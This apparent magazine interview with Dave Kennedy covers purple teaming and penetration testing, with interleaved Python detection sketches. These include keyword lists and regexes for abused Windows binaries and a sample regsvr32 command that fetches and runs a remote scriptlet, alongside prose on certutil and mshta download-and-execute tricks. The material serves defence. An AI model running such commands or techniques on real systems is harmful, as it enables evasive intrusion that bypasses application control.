Information Security

Defending the digital infrastructure


White hat Dave Kennedy on purple teaming, penetration testing

Russia and other nation-states use application control bypass techniques because they don't "trigger any alarms," the chief hacking officer says.

Dave Kennedy is renowned in the security industry as a co-author of Metasploit: The Penetration Tester's Guide (No Starch Press, July 2011). The bestselling book offers guidance on using the Ruby-based open source "framework" to exploit vulnerabilities in computer systems. The framework is widely used by security testers -- and hackers.

A former CSO, Kennedy led the global security program at Diebold Inc. prior to starting TrustedSec, an information security assessment and consulting firm based in Strongsville, Ohio. He is also the co-founder and chief hacking officer at Binary Defense, a managed endpoint detection and response provider located in nearby Hudson; the company's technology incorporates the Penetration Testing Execution Standard that he co-created.

In addition to his work as a white hat hacker, Kennedy is a frequent speaker at industry events and one of the founders of DerbyCon, a security conference in Louisville, Kentucky. Here, he chats with Marcus Ranum -- once a skeptic of penetration testing -- about purple teaming and the latest techniques that hackers use to compromise enterprise environments.

Editor's note: This interview has been edited for length and clarity.

What is purple teaming, and how does it fit into the spectrum of penetration tests?

Dave Kennedy: Penetration testing is still very valid for companies that can ingest it and use it as a way of understanding how attackers are getting into an organization, in order to better strengthen it. Where you start to see the industry shift is that there's a big gap between protection and the time you have to implement it, so detecting gaps becomes a huge focus for an organization. You can say, 'OK, I will accept that Bob in sales' computer got compromised, but I don't want 50 other computers to be compromised before I figure out how the breach occurred.'

It's about shrinking your window down and understanding the tactics, techniques and procedures of the hackers. And building those detection controls so that, hopefully, you have a better way of detecting an attack in its earlier stage.

Let's take an example of that: Suppose an exploit in a phishing attack gets to Bob in sales; Bob opens a link and he becomes compromised. In that scenario, I just established a command-and-control infrastructure; I can execute commands of some shape or form. I'm probably going to escalate privileges. I'll try to extract cleartext passwords from memory, and move laterally to another system.

Those are all very specific phases of an attack that we can build detection criteria off of and simulate, so we can get better at detection in a lot of different phases. Maybe we can't detect their command-and-control infrastructure because we're not doing SSL termination, but we hit them on the privilege-escalation piece. Maybe we can hit them on the PowerShell commands or the WMI [Windows Management Instrumentation] commands they're using. There are multiple phases we can start to build out in our program in order to get better at it. Who better to do that than the folks who understand adversary emulation or the techniques that hackers use to gain access into the environment?
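To make that phase-by-phase mapping concrete, a purple team might keep a simple coverage checklist along the lines of the Python sketch below. The phases follow the attack chain Kennedy describes; the event IDs and log-source names are illustrative assumptions, not any specific product's schema.

```python
# Hypothetical sketch: map the attack phases described above to the telemetry
# a purple team would need in order to detect them. Event IDs and source
# names are illustrative assumptions.

ATTACK_PHASES = {
    "command_and_control": {
        "telemetry": ["proxy logs", "DNS logs"],
        "example_signal": "periodic beaconing to a rare external domain",
    },
    "privilege_escalation": {
        "telemetry": ["Windows Security log (events 4672/4688)"],
        "example_signal": "unexpected process started with an elevated token",
    },
    "credential_access": {
        "telemetry": ["Sysmon event 10 (process access)"],
        "example_signal": "non-system process opening a handle to lsass.exe",
    },
    "lateral_movement": {
        "telemetry": ["Security event 4624 logon type 3", "WMI/PowerShell remoting logs"],
        "example_signal": "admin logons fanning out from one workstation",
    },
}

def coverage_report(available_sources):
    """Return the phases with no matching log source -- the detection gaps."""
    gaps = []
    for phase, needs in ATTACK_PHASES.items():
        if not any(src in available_sources for src in needs["telemetry"]):
            gaps.append(phase)
    return gaps

if __name__ == "__main__":
    # Example: a SIEM that only ingests proxy logs and the Security log
    print(coverage_report({"proxy logs", "Windows Security log (events 4672/4688)"}))
```

Run against the sources a SIEM actually ingests, the report shows which phases have no telemetry at all, which is where the exercise should start.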

Instead of it being a penetration test, it's about working with the blue team -- whether that's the security operations center or the firewall team or systems administrators. It's about understanding that we're going to simulate all these different attacks across your environment.

It's not just phishing a domain user -- we don't care about that. We don't care about getting domain administrator rights. We don't care about going after parts of the infrastructure.


It's about simulating those sorts of attacks to learn what you're seeing and not seeing. Maybe we're not seeing something because we don't have a specific log source. Maybe we haven't written a correlation rule that detects an action that shouldn't happen.

It becomes more about the pattern of behavior than about a specific type of attack. For example, application control bypass techniques are a big thing that is happening right now -- 80% to 85% of compromises still occur from unsigned executables. We don't do a good enough job with that.
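As a rough illustration of that unsigned-executable point, the sketch below checks whether a Windows executable carries an embedded Authenticode signature at all. It uses the third-party pefile library, which is an assumption (the interview names no tooling), and it deliberately ignores catalog signing and signature validation.

```python
# Rough illustration only: flag PE files that carry no embedded Authenticode
# signature blob. Requires the third-party 'pefile' package (an assumption).
# This does not validate signatures or account for catalog-signed files.
import sys
import pefile

def has_embedded_signature(path: str) -> bool:
    pe = pefile.PE(path, fast_load=True)
    security_dir = pe.OPTIONAL_HEADER.DATA_DIRECTORY[
        pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_SECURITY"]
    ]
    return security_dir.VirtualAddress != 0 and security_dir.Size != 0

if __name__ == "__main__":
    for exe in sys.argv[1:]:
        status = "signed (embedded)" if has_embedded_signature(exe) else "unsigned"
        print(f"{exe}: {status}")
```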

The second piece is PowerShell -- PowerShell exploitation has been a big avenue of attack, too. But PowerShell has gotten a lot better, so attackers have had to look for new ways around it. PowerShell has script block logging and constrained language mode, and integration with AMSI [the Antimalware Scan Interface]. It's become a harder attack surface for hackers because it logs everything.
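Here is a minimal sketch of the kind of detection that script block logging makes possible, assuming PowerShell event ID 4104 records have been exported as JSON lines; the field names and the keyword list are assumptions for illustration, not a standard schema or a complete rule set.

```python
# Minimal sketch: scan exported PowerShell script block logging events
# (event ID 4104) for strings commonly seen in download cradles and
# in-memory execution. Field names ("EventID", "ScriptBlockText") are
# assumptions about the export format.
import json
import sys

SUSPICIOUS = [
    "FromBase64String",      # encoded payload staging
    "DownloadString",        # in-memory download cradle
    "Invoke-Expression",     # dynamic execution of fetched code
    "Reflection.Assembly",   # loading .NET assemblies from memory
]

def flag_scriptblocks(path):
    with open(path, encoding="utf-8") as fh:
        for line in fh:
            event = json.loads(line)
            if event.get("EventID") != 4104:
                continue
            text = event.get("ScriptBlockText", "")
            hits = [s for s in SUSPICIOUS if s.lower() in text.lower()]
            if hits:
                yield hits, text[:120]

if __name__ == "__main__":
    for hits, snippet in flag_scriptblocks(sys.argv[1]):
        print(f"{hits}: {snippet}")
```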

Now you can build great detection off of PowerShell, and that's an avenue that can tip us off about a hacker. What's great about Microsoft is that they have thousands of binaries on the platform, and some of those binaries give us the ability for code execution that doesn't log anything. So there are a whole bunch of binaries from Microsoft that are code-signed, but if you give them certain parameters, they go and download code from the internet and execute it. So application control bypass techniques are a very active area, and that's where you see a lot of adversaries like Russia and other nation-states using those methods. They don't trigger any alarms.

I am gobsmacked at what horrible design decisions Microsoft makes.

Kennedy: Look at certutil [installed as part of Microsoft's Active Directory Certificate Services]. It imports and exports certificates on the command line. It has a URLCache option built into it that allows you to download code from the internet and execute it. Regsvr32.exe is a Windows binary, code-signed by Microsoft. It has a built-in web browser that is proxy-aware and allows you to download and execute code from the internet. It never touches the disk; it's loaded directly into memory -- it's completely evasive. Mshta [the utility for the Microsoft HTML application host] is another one. BGInfo [a Sysinternals utility] is used for displaying your IP address in the background of your screens, and it has remote code-execution capability via VBScript. All of these are methods that hackers are using now.
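The detection side of those techniques usually comes down to watching process-creation command lines (Sysmon event ID 1 or Windows event 4688) for trusted, signed binaries being invoked with network-fetch arguments. The sketch below encodes that idea for the binaries Kennedy names; the patterns are simplified assumptions that would need tuning against real telemetry.

```python
# Illustrative sketch: inspect process-creation command lines for the signed
# Microsoft binaries discussed above being used to fetch or run remote code.
# The regexes are simplified assumptions, not production detection logic.
import re

LOLBIN_PATTERNS = {
    "certutil": re.compile(r"certutil(\.exe)?\s+.*urlcache.*https?://", re.I),
    "regsvr32": re.compile(r"regsvr32(\.exe)?\s+.*(/i:)?https?://.*scrobj\.dll", re.I),
    "mshta":    re.compile(r"mshta(\.exe)?\s+https?://", re.I),
    "bginfo":   re.compile(r"bginfo(\.exe)?\s+.*\.bgi\b.*(https?://|\\\\)", re.I),
}

def check_command_line(cmdline: str):
    """Return the names of any suspicious binary patterns the command line matches."""
    return [name for name, pat in LOLBIN_PATTERNS.items() if pat.search(cmdline)]

# Example: a regsvr32-style download-and-execute command line
print(check_command_line(
    "regsvr32.exe /s /n /u /i:http://example.com/payload.sct scrobj.dll"
))
```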

It's important to know this, because most companies spend millions of dollars building a security operations center [SOC] or a SIEM [security information and event management] system. They have analysts and alarms, and they're looking for things like brute-forcing user accounts. But the SOC never gets better; it just focuses on what you know from the SIEM. With purple teaming, you're bringing in the red team, which is typically the group that understands those techniques, and mapping what they find to the capabilities that are in your environment. You walk out of the exercise with a whole bunch of new rules.
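The "new rules" outcome Kennedy describes can be tracked with bookkeeping as simple as the sketch below: record which simulated techniques actually produced an alert, and what remains is the list of detections still to write. The technique IDs follow MITRE ATT&CK naming; the alert data is a made-up example.

```python
# Sketch of purple-team exercise bookkeeping: which simulated techniques did
# the SOC actually alert on, and which rules still need to be written?
simulated = {
    "T1059.001": "PowerShell download cradle",
    "T1218.010": "Regsvr32 remote scriptlet execution",
    "T1003.001": "LSASS memory credential dump",
    "T1021.002": "Lateral movement over SMB admin shares",
}

alerts_fired = {"T1003.001"}  # what the SIEM caught during the test (example data)

rules_to_write = {
    tid: name for tid, name in simulated.items() if tid not in alerts_fired
}

for tid, name in rules_to_write.items():
    print(f"gap: {tid} ({name})")
```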

What do you do with the customers who don't fix anything, anyway? Don't you still have the customers who say, 'Oh, thanks a lot for the information!' And then they never do anything?


Kennedy: Purple teaming fixes a lot of the core issues that we had on the pen-testing front. What we'd typically do -- we'd go to a company, we'd rip through their organization, we'd destroy them. And then we'd hand them a report and say, 'Good luck.'

It was a very hostile environment, because you're basically destroying a company and showing them all of the issues that the team that's supposed to fix them didn't fix in the first place. 'Hey, we saw you didn't do this right, and you didn't do that right.' People would get very defensive. It caused a lot of hostility between security and IT. [Purple teaming] becomes more of a collaborative approach. It's not pointing out the flaws of IT; it's working together to find out how you can get better.

It does require a maturity level for a company to be at the point where purple teaming works. They need to have the basic stuff covered, like vulnerability management, patch management and good default configuration. Penetration testing is the next evolution from that. You still need penetration testing, because it starts to identify where you have deficiencies in your programs. If I can rip into your organization through seven different web applications, you probably have a problem with your software development lifecycle, and you need to focus on secure coding practices. Pen testing gives you a good understanding about where your exposures are, but it has shifted from being 'Let's go in and get domain admin rights' to 'Let's find as many ways into the organization as possible and focus on gap analysis.'

I used to tell clients: If you can't catch your pen tester, you won't catch a hacker. Orienting your security architecture toward detecting hackers that are 'on your side' seems like an obvious measure, but I think a lot of organizations that do pen tests are just looking for a compliance checkbox.

Kennedy: We do a lot of work for large organizations -- three of the Fortune 5 -- and they have a higher level of maturity. What I can say is that it is exponentially harder for us, as attackers, to get into companies that do purple teaming. It has gotten to the point with some of our customers where it's so difficult to get in that I had to create a research division at TrustedSec that just focuses on developing new techniques.

Now we've just got to get everyone to do the hard part -- get into the trenches and manage their networks carefully with an active-defense model.
